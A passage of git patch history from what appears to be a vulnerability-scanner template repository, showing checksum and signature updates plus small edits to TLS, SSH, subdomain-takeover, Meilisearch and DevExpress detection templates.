http/exposed-panels/oracle-enterprise-manager-login.yaml:76e328b658d117d5c45bd8f8f0114d5efff5ba2a http/exposed-panels/oracle-integrated-manager.yaml:33fabda935c2ddc490939f8e5d5abc27fd5f1f49 http/exposed-panels/oracle-opera-login.yaml:1a1e64aebaeb4635b85cfcdfe7f88b1856e35c3f @@ -5371,7 +5372,7 @@ http/misconfiguration/http-missing-security-headers.yaml:62e00bd5126dbd778c766aa http/misconfiguration/https-to-http-redirect.yaml:cccf8e9ceb416d8e224b314e9952d676e592c00e http/misconfiguration/ibm-friendly-path-exposure.yaml:77e6c72a9cae1a9b0a6afd79b159b08db996e463 http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb77fd1 -http/misconfiguration/imgproxy-unauth.yaml:1a65d48eccec521f1c6530ddf0fa01fdce317513 +http/misconfiguration/imgproxy-unauth.yaml:2eb18535d095cf898aa3cd76128382ff8e92acff http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421 http/misconfiguration/installer/akeeba-installer.yaml:56fc3c8f70ae91e8cb4207b97c0b088a845537f4 http/misconfiguration/installer/alma-installer.yaml:50fb01e501f60ce17284f44c30bf672eb6986d6a @@ -5399,7 +5400,7 @@ http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b431 http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057 http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36 -http/misconfiguration/installer/easy-viserlabs-installer.yaml:27d9b628a6aa3315ab36792659f07e5b2aa37968 +http/misconfiguration/installer/easy-viserlabs-installer.yaml:7ddea4c605e0c2129861c43f62aa0988f8883b51 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 @@ -5412,7 +5413,7 @@ http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283 http/misconfiguration/installer/gitea-installer.yaml:5e6a8a0d61e3cf52bdaeb96c7a1784a046292e7e http/misconfiguration/installer/gogs-installer.yaml:761e7ee7354915c029670f36c1360b8d8bb97a4d -http/misconfiguration/installer/ids-skills-installer.yaml:095eb407b5a42dfeb59dc77420189df7a9200249 +http/misconfiguration/installer/ids-skills-installer.yaml:ff7fee92596ae2212f48a0b75bfce6defd2f8baa http/misconfiguration/installer/impresspages-installer.yaml:a202181818bcfe8005a744f81027dc06de05dc40 http/misconfiguration/installer/imprivata-installer.yaml:876cea672f3efc0085a779a6d8c9305c994a2ea3 http/misconfiguration/installer/indegy-sensor-installer.yaml:deaa2d09c184bd9eee230c651699d1f1ccc8afcc @@ -8545,7 +8546,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f2b21047cb599e49254aa764ac839fd1da9f9efc +templates-checksum.txt:a2432d9679b099bea3860e1ab4408077d0c3c80d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7d4832be1f88ddbd6ba7fe12f115cdcb3506abe6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 May 2024 09:20:41 +0000 Subject: [PATCH 1155/1768] Auto Template Signing [Tue May 21 09:20:41 UTC 2024] :robot: --- http/exposed-panels/oracle-ebusiness-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/oracle-ebusiness-panel.yaml b/http/exposed-panels/oracle-ebusiness-panel.yaml index 5cc6798cd6..648172e2b0 100644 --- a/http/exposed-panels/oracle-ebusiness-panel.yaml +++ b/http/exposed-panels/oracle-ebusiness-panel.yaml @@ -35,3 +35,4 @@ http: group: 1 regex: - '(?i)/OA_HTML/cabo/oajsLibs/oafcore([A-Z0-9]+).js' +# digest: 4a0a00473045022039282031436f903368fe6f95110086c3eadc3ce54ed18f742490ac768cf6946b022100dd9c7d19b0484ac641748a2a94286dc023deea5b05eef4c3f2a36e972d5b749d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c89c525d291dc1421a72bf84cea6130e9174699a Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 21 May 2024 22:08:07 +0530 Subject: [PATCH 1156/1768] request sequence update (#9826) * request sequence update * added name to included in output --- ssl/deprecated-tls.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/ssl/deprecated-tls.yaml b/ssl/deprecated-tls.yaml index 9adc90d54e..7f7352fc4a 100644 --- a/ssl/deprecated-tls.yaml +++ b/ssl/deprecated-tls.yaml @@ -1,7 +1,7 @@ id: deprecated-tls info: - name: Deprecated TLS Detection (TLS 1.1 or SSLv3) + name: Deprecated TLS Detection author: righettod,forgedhallpass severity: info reference: @@ -17,11 +17,12 @@ info: ssl: - address: "{{Host}}:{{Port}}" - min_version: ssl30 - max_version: ssl30 + min_version: tls11 + max_version: tls11 extractors: - type: json + name: tls_1.1 json: - " .tls_version" @@ -31,15 +32,17 @@ ssl: extractors: - type: json + name: tls_1.0 json: - " .tls_version" - address: "{{Host}}:{{Port}}" - min_version: tls11 - max_version: tls11 + min_version: ssl30 + max_version: ssl30 extractors: - type: json + name: ssl_3.0 json: - " .tls_version" # digest: 4a0a00473045022100f731472bbbf929156694224fdc4e2ac33f732d474ede8637b638ecac34b9ef2702203f04bc8a5bf06fbb3e98ec0562fd6ee351aa287cf21c581ba27527449622c15f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 12bb7df6b1b1248c9b61428a2374c0bd0b888f22 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 21 May 2024 16:38:30 +0000 Subject: [PATCH 1157/1768] Auto Generated New Template Addition List [Tue May 21 16:38:30 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a0f464fb75..372db2b34f 100644 --- a/.new-additions +++ b/.new-additions @@ -20,6 +20,7 @@ http/exposed-panels/ghost-panel.yaml http/exposed-panels/matomo-panel.yaml http/exposed-panels/n8n-panel.yaml http/exposed-panels/nocodb-panel.yaml +http/exposed-panels/oracle-ebusiness-panel.yaml http/exposed-panels/pocketbase-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/tiny-rss-panel.yaml From a64dc27764f5021911614c2972cfc69beb34611d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 May 2024 16:38:37 +0000 Subject: [PATCH 1158/1768] Auto Generated Templates Checksum [Tue May 21 16:38:37 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ab566aa020..9949d77343 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4174,7 +4174,7 @@ http/exposed-panels/opinio-panel.yaml:6f9232a1cd33bd4b348c6274cdd2436d7eb04405 http/exposed-panels/oracle-business-control.yaml:1a40c6d9b1046d965a1e9fecd649423329de4de4 http/exposed-panels/oracle-business-intelligence.yaml:7ae31ff5ddccb3f4a213467b032af88787cf2b49 http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 -http/exposed-panels/oracle-ebusiness-panel.yaml:a1e3aced3d8371d404cc5b765705fefbd76dc7de +http/exposed-panels/oracle-ebusiness-panel.yaml:6e0870f35289ffd8ffb69a3bf83b04ff116a95b0 http/exposed-panels/oracle-enterprise-manager-login.yaml:76e328b658d117d5c45bd8f8f0114d5efff5ba2a http/exposed-panels/oracle-integrated-manager.yaml:33fabda935c2ddc490939f8e5d5abc27fd5f1f49 http/exposed-panels/oracle-opera-login.yaml:1a1e64aebaeb4635b85cfcdfe7f88b1856e35c3f @@ -8533,7 +8533,7 @@ ssl/c2/quasar-rat-c2.yaml:c3bf40b6fd278294f273f10d6826f401cec3cb1f ssl/c2/shadowpad-c2.yaml:45b74e7a9adff29793a0efa5bfcf1afa3bcfeacd ssl/c2/sliver-c2.yaml:35ed94dbbde1615aee5d86a3ce75791cc5d4b631 ssl/c2/venomrat.yaml:deffc1efa16ee53701962b41e8cbcab9e106208d -ssl/deprecated-tls.yaml:076aee61b221863263ff2e6704bab32b362b1a67 +ssl/deprecated-tls.yaml:a377f33545c47d31417e3ba1b59ebf63d2970d23 ssl/detect-ssl-issuer.yaml:3483faacc9cc303cac30d6c844bbe0a47c1d2e39 ssl/expired-ssl.yaml:a0c32548eb093d043f77f77eb905ac69e5d0e5b0 ssl/insecure-cipher-suite-detect.yaml:33ff0bbe66e06d4a01b13e40512e2838c9cf7f13 @@ -8546,7 +8546,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a2432d9679b099bea3860e1ab4408077d0c3c80d +templates-checksum.txt:ee4ac2afea6977c2f93528ea016164dc59d5f525 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 45b84b7fb9fccbb2ed19d7b86b3b16c45d6bc45a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 21 May 2024 16:39:12 +0000 Subject: [PATCH 1159/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 996f14cfb9..a86de8d1ef 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -25,6 +25,7 @@ on: - 'http/exposed-panels/matomo-panel.yaml' - 'http/exposed-panels/n8n-panel.yaml' - 'http/exposed-panels/nocodb-panel.yaml' + - 'http/exposed-panels/oracle-ebusiness-panel.yaml' - 'http/exposed-panels/pocketbase-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' - 'http/exposed-panels/tiny-rss-panel.yaml' From a87ab39015e9d7ef9000aeed3f96f0b421ff68dd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 May 2024 16:40:25 +0000 Subject: [PATCH 1160/1768] Auto Template Signing [Tue May 21 16:40:25 UTC 2024] :robot: --- ssl/deprecated-tls.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ssl/deprecated-tls.yaml b/ssl/deprecated-tls.yaml index 7f7352fc4a..f4eb823cf7 100644 --- a/ssl/deprecated-tls.yaml +++ b/ssl/deprecated-tls.yaml @@ -45,4 +45,4 @@ ssl: name: ssl_3.0 json: - " .tls_version" -# digest: 4a0a00473045022100f731472bbbf929156694224fdc4e2ac33f732d474ede8637b638ecac34b9ef2702203f04bc8a5bf06fbb3e98ec0562fd6ee351aa287cf21c581ba27527449622c15f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022025cdfdc1eae1340e9d512e1e3b656b0cf356bc434ad0f011fbfa02bb502c4afa022037027e15824922e3f64c641c41b2beab0311f255e2d84e5b4dd1bebff20e944e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0d38d268886941cba4c67a6dd52c3193f8bf755d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 22 May 2024 00:30:19 +0530 Subject: [PATCH 1161/1768] dropbear --- network/detection/dropbear-cbc-ciphers.yaml | 33 ------------------ network/misconfig/dropbear-weakalgo.yaml | 33 ------------------ network/misconfig/dropbear-weakmac.yaml | 38 --------------------- 3 files changed, 104 deletions(-) delete mode 100644 network/detection/dropbear-cbc-ciphers.yaml delete mode 100644 network/misconfig/dropbear-weakalgo.yaml delete mode 100644 network/misconfig/dropbear-weakmac.yaml diff --git a/network/detection/dropbear-cbc-ciphers.yaml b/network/detection/dropbear-cbc-ciphers.yaml deleted file mode 100644 index c9ecc8114a..0000000000 --- a/network/detection/dropbear-cbc-ciphers.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: dropbear-cbc-ciphers - -info: - name: Dropbear sshd CBC Mode Ciphers Detection - author: pussycat0x - severity: low - description: | - The SSH server is configured to support Cipher Block Chaining (CBC) encryption. This may allow an attacker to recover the plaintext message from the ciphertext. - reference: | - https://www.tenable.com/plugins/nessus/70658 - remediation: | - Disable CBC Ciphers. - metadata: - max-request: 1 - shodan-query: product:"Dropbear sshd" - verified: true - tags: network,ssh,dropbear,detect - -tcp: - - inputs: - - data: "\n" - - host: - - "{{Hostname}}" - port: 22 - - matchers: - - type: word - words: - - "cbc" - - "SSH-" - condition: and -# digest: 4a0a00473045022002fae16b256b4653ad2b98f85511cd26f00c12b388af06a773784c5a84485c17022100e96053936cf02101d8c3295bc5c5797df04c9fc0e666e5fda59f09208ff75826:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/misconfig/dropbear-weakalgo.yaml b/network/misconfig/dropbear-weakalgo.yaml deleted file mode 100644 index d8034d65c1..0000000000 --- a/network/misconfig/dropbear-weakalgo.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: dropbear-weakalgo - -info: - name: Dropbear sshd Weak Key Exchange Algorithms Enabled - author: pussycat0x - severity: low - description: | - The SSH key exchange algorithm is fundamental to keep the protocol secure. It is what allows two previously unknown parties to generate a shared key in plain sight, and have that secret remain private to the client and server. Over time, some implementations of this algorithm have been identified as weak or vulnerable. - reference: | - https://www.virtuesecurity.com/kb/ssh-weak-key-exchange-algorithms-enabled - remediation: | - Disable the weak algorithms. - metadata: - max-request: 1 - shodan-query: product:"Dropbear sshd" - verified: true - tags: network,ssh,dropbear,misconfig - -tcp: - - inputs: - - data: "\n" - - host: - - "{{Hostname}}" - port: 22 - - matchers: - - type: word - words: - - "diffie-hellman-group-exchange-sha1" - - "diffie-hellman-group1-sha1" - condition: or -# digest: 4a0a00473045022100c67a648de03e7a12d40987111db58dbe3c171939915e2f6c252204426551ad18022008ace27d961d279e82a266d8528612dd10fda1a23346679b3063892ba540ef48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/misconfig/dropbear-weakmac.yaml b/network/misconfig/dropbear-weakmac.yaml deleted file mode 100644 index 56f4dcb786..0000000000 --- a/network/misconfig/dropbear-weakmac.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: dropbear-weakmac - -info: - name: Dropbear Weak MAC Algorithms Enabled - author: pussycat0x - severity: low - description: | - The mac-alg command specifies which MAC algorithms in the SSH client profile for SSH encryption negotiation with an SFTP server when the DataPower Gateway acts as an SFTP client. - reference: | - https://www.virtuesecurity.com/kb/ssh-weak-mac-algorithms-enabled - remediation: | - Disable MD5 and 96-bit MAC algorithms. - metadata: - max-request: 1 - shodan-query: product:"Dropbear sshd" - verified: true - tags: network,ssh,dropbear,misconfig - -tcp: - - inputs: - - data: "\n" - - host: - - "{{Hostname}}" - port: 22 - - matchers-condition: and - matchers: - - type: word - words: - - "hmac-md5" - - "hmac-sha1" - condition: or - - - type: word - words: - - "SSH-" -# digest: 4a0a0047304502201e312e2112fd02be44c3d23cd1171be0f3e848d31cb26cebf4fef752f3cd645a022100ec6214b3268a8c3179da31e03e230be9b84a0750e5ce1bf134e50d2dc5e9fe2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e776ef6baba52740ff3d115d7b5b844f576344df Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 21 May 2024 22:20:44 -0500 Subject: [PATCH 1162/1768] Update flexbe-takeover.yaml Original link was removed, replaced with archived version. --- http/takeovers/flexbe-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/takeovers/flexbe-takeover.yaml b/http/takeovers/flexbe-takeover.yaml index 8646850340..befd9427aa 100644 --- a/http/takeovers/flexbe-takeover.yaml +++ b/http/takeovers/flexbe-takeover.yaml @@ -6,7 +6,7 @@ info: severity: high description: Flexbe takeover was detected. reference: - - https://github.com/EdOverflow/can-i-take-over-xyz/issues/237 + - https://web.archive.org/web/20211002185648/https://github.com/EdOverflow/can-i-take-over-xyz/issues/237 - https://help.flexbe.com/domains/ metadata: max-request: 1 @@ -32,4 +32,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100815bad00e060131f9f67695b3e5746f6b5feb9ac156fc15500adb76f825f1c92022100a1e5408a0f54a721f143c3b7f44e004f98dbf784584a2c3d9fff0925a0c075ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100815bad00e060131f9f67695b3e5746f6b5feb9ac156fc15500adb76f825f1c92022100a1e5408a0f54a721f143c3b7f44e004f98dbf784584a2c3d9fff0925a0c075ad:922c64590222798bb761d5b6d8e72950 From a6b6472c7d7dab78d7f899c0923b1ef7f68d6ef3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 05:02:10 +0000 Subject: [PATCH 1164/1768] Auto Generated Templates Checksum [Wed May 22 05:02:10 UTC 2024] :robot: --- templates-checksum.txt | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9949d77343..8ad4042892 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8401,7 +8401,6 @@ network/detection/cql-native-transport.yaml:8f848170731a7e132e745e9ce45824c9e2fb network/detection/detect-addpac-voip-gateway.yaml:a06e5be5c8af1fc7e79ed9011ba9c91403d1069f network/detection/detect-jabber-xmpp.yaml:db7472ba34e3306c0afd5b3bfe535e1764de8da4 network/detection/dotnet-remoting-service-detect.yaml:b438f75ba5e8c1f227d14794db20172ab89468cf -network/detection/dropbear-cbc-ciphers.yaml:4db2cb7ef6fafd8c140a8a864f45e9ea321a22fc network/detection/esmtp-detect.yaml:dee11038a25d263f8b3d0f06ad53fb2b84a44c2a network/detection/exim-detect.yaml:c9541f70a921c64575e67ed7c7e0a364a28c613e network/detection/expn-mail-detect.yaml:651740f7523e435b000d01e7a9103c90bf25d3f5 @@ -8489,8 +8488,6 @@ network/misconfig/apache-dubbo-unauth.yaml:622efcfac18e7a5b1ece09a1d8a34d857d6bc network/misconfig/apache-rocketmq-broker-unauth.yaml:f6421f83ae1682e3561d7492aa5140e80e8586a7 network/misconfig/clamav-unauth.yaml:e256d077da3729eeee6c1cd4cc7ae91b23f8ebe3 network/misconfig/clickhouse-unauth.yaml:f5b90bc8e168b55bfe3543a69a59cfc508adb619 -network/misconfig/dropbear-weakalgo.yaml:6c7daef01b97062533ba41e8c242ef9fc8a546bd -network/misconfig/dropbear-weakmac.yaml:afc50bf81ebe0d85bb0f2a2be9be8ae8df3fc7de network/misconfig/erlang-daemon.yaml:5360cef90f48dc3c6bdab6df6e44245f243f423c network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109 @@ -8533,7 +8530,7 @@ ssl/c2/quasar-rat-c2.yaml:c3bf40b6fd278294f273f10d6826f401cec3cb1f ssl/c2/shadowpad-c2.yaml:45b74e7a9adff29793a0efa5bfcf1afa3bcfeacd ssl/c2/sliver-c2.yaml:35ed94dbbde1615aee5d86a3ce75791cc5d4b631 ssl/c2/venomrat.yaml:deffc1efa16ee53701962b41e8cbcab9e106208d -ssl/deprecated-tls.yaml:a377f33545c47d31417e3ba1b59ebf63d2970d23 +ssl/deprecated-tls.yaml:83590258f2dd4d9712d03d77a2076a9ee66c37df ssl/detect-ssl-issuer.yaml:3483faacc9cc303cac30d6c844bbe0a47c1d2e39 ssl/expired-ssl.yaml:a0c32548eb093d043f77f77eb905ac69e5d0e5b0 ssl/insecure-cipher-suite-detect.yaml:33ff0bbe66e06d4a01b13e40512e2838c9cf7f13 @@ -8546,7 +8543,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ee4ac2afea6977c2f93528ea016164dc59d5f525 +templates-checksum.txt:fe63b711d1c7f1345676ab81b4d7c1477c29803e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7478937a50ed60a2a131c227dfdb67b5d9977042 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 22 May 2024 12:12:06 +0530 Subject: [PATCH 1165/1768] Update meilisearch-detect.yaml --- http/technologies/meilisearch-detect.yaml | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/http/technologies/meilisearch-detect.yaml b/http/technologies/meilisearch-detect.yaml index e92e1c09cb..fd36779bbc 100644 --- a/http/technologies/meilisearch-detect.yaml +++ b/http/technologies/meilisearch-detect.yaml @@ -24,11 +24,5 @@ http: - type: dsl dsl: - 'status_code == 200' - - 'contains(content_type, "application/json")' + - 'contains(body, "Meilisearch is running")' condition: and - - - type: word - part: body - encoding: hex - words: - - "7B22737461747573223A224D65696C697365617263682069732072756E6E696E67227D" From 14069a7ec3c9f6111d76dbd68a47494737675e6f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 22 May 2024 06:46:16 +0000 Subject: [PATCH 1166/1768] Auto Generated New Template Addition List [Wed May 22 06:46:15 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 372db2b34f..16ad1ac877 100644 --- a/.new-additions +++ b/.new-additions @@ -39,6 +39,7 @@ http/technologies/apache/apache-answer-detect.yaml http/technologies/boa-web-server.yaml http/technologies/craftercms-detect.yaml http/technologies/imgproxy-detect.yaml +http/technologies/meilisearch-detect.yaml http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml http/technologies/uni-gui-framework.yaml From 62f62bda0076b8e71866ca3d8ac7a29751417f24 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 06:46:21 +0000 Subject: [PATCH 1167/1768] Auto Generated Templates Checksum [Wed May 22 06:46:21 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8ad4042892..74d33e9f3b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6824,6 +6824,7 @@ http/technologies/maian-cart-detect.yaml:04535015f709d487931505967e5b18023229a19 http/technologies/mappproxy-detect.yaml:34f8715bb04d15e410646087f140852d5e67e6a4 http/technologies/matrix-detect.yaml:33b6e2aef92cf34e8fdfa015ed1d7c4cbb0c9ca7 http/technologies/matrix-homeserver-detect.yaml:03f44055b1385667e1d860c9160c9b0a3b5b24b0 +http/technologies/meilisearch-detect.yaml:ea0eed8f2dea564317914a7c34f7bf1b77dea059 http/technologies/metatag-cms.yaml:dddeec9fe5817ce89ce12c7fb09e5702c6cf5ea7 http/technologies/microsoft/aspnet-version-detect.yaml:e37201ff3f26965873974a21c6bd351a7cbe851c http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:8f445b5529fb0bb219994e249b2cc3aa4e868f97 @@ -8543,7 +8544,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:fe63b711d1c7f1345676ab81b4d7c1477c29803e +templates-checksum.txt:b5a0879341065078cca8089129c0afa0b34a7888 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6352edf7bfc56d46931950c9e9a7f33c9e16b557 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 22 May 2024 06:47:06 +0000 Subject: [PATCH 1168/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a86de8d1ef..c3cd819f41 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -44,6 +44,7 @@ on: - 'http/technologies/boa-web-server.yaml' - 'http/technologies/craftercms-detect.yaml' - 'http/technologies/imgproxy-detect.yaml' + - 'http/technologies/meilisearch-detect.yaml' - 'http/technologies/statamic-detect.yaml' - 'http/technologies/tinyproxy-detect.yaml' - 'http/technologies/uni-gui-framework.yaml' From 185252ac1bcf7e33aabb9532c441f3da5c4858d2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 06:48:06 +0000 Subject: [PATCH 1169/1768] Auto Template Signing [Wed May 22 06:48:06 UTC 2024] :robot: --- http/technologies/meilisearch-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/meilisearch-detect.yaml b/http/technologies/meilisearch-detect.yaml index fd36779bbc..e5593da0b4 100644 --- a/http/technologies/meilisearch-detect.yaml +++ b/http/technologies/meilisearch-detect.yaml @@ -26,3 +26,4 @@ http: - 'status_code == 200' - 'contains(body, "Meilisearch is running")' condition: and +# digest: 4a0a00473045022100babc8ffda11e34e8975a3e213cfb32312927b85bd14d40abe1d6b551aa91f4fb022075789999bea0d5ec76b5432eb14265895e6d1ab536fc369f029715755ff4d853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b5712e32b172f8304912b306f8ffd232c5a98e87 Mon Sep 17 00:00:00 2001 From: jmac774 <104130511+jmac774@users.noreply.github.com> Date: Wed, 22 May 2024 11:10:28 +0200 Subject: [PATCH 1170/1768] Update devexpress-detect.yaml description & reference --- http/technologies/devexpress-detect.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/http/technologies/devexpress-detect.yaml b/http/technologies/devexpress-detect.yaml index 6714d9bbcc..deef82eabf 100644 --- a/http/technologies/devexpress-detect.yaml +++ b/http/technologies/devexpress-detect.yaml @@ -7,6 +7,10 @@ info: metadata: max-request: 1 shodan-query: html:"DXR.axd" + description: "Detect DevExpress based on existence of its HTTP handler for serving images, scripts and other resources to the client side" + reference: + - https://github.com/DevExpress/aspnet-security-bestpractices/blob/master/SecurityBestPractices.WebForms/README.md#53-information-exposure-through-source-code + - https://supportcenter.devexpress.com/ticket/details/q311748/dxr-axd-what-is-it-and-how-to-disable-it tags: devexpress,iis,microsoft,asp,tech http: From 170caa6aac6a144a3abc986187b7da1a5fc27dbd Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 22 May 2024 09:13:33 +0000 Subject: [PATCH 1172/1768] Auto Generated New Template Addition List [Wed May 22 09:13:33 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 16ad1ac877..dbd9859d6e 100644 --- a/.new-additions +++ b/.new-additions @@ -32,6 +32,7 @@ http/misconfiguration/installer/easy-viserlabs-installer.yaml http/misconfiguration/installer/froxlor-installer.yaml http/misconfiguration/installer/ids-skills-installer.yaml http/misconfiguration/installer/moosocial-installer.yaml +http/misconfiguration/installer/openfire-setup.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/installer/trilium-notes-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml From 44fd72b646e14ef5475173ad39c8ba383d78ffa5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 22 May 2024 09:14:12 +0000 Subject: [PATCH 1173/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index c3cd819f41..122254169b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -37,6 +37,7 @@ on: - 'http/misconfiguration/installer/froxlor-installer.yaml' - 'http/misconfiguration/installer/ids-skills-installer.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' + - 'http/misconfiguration/installer/openfire-setup.yaml' - 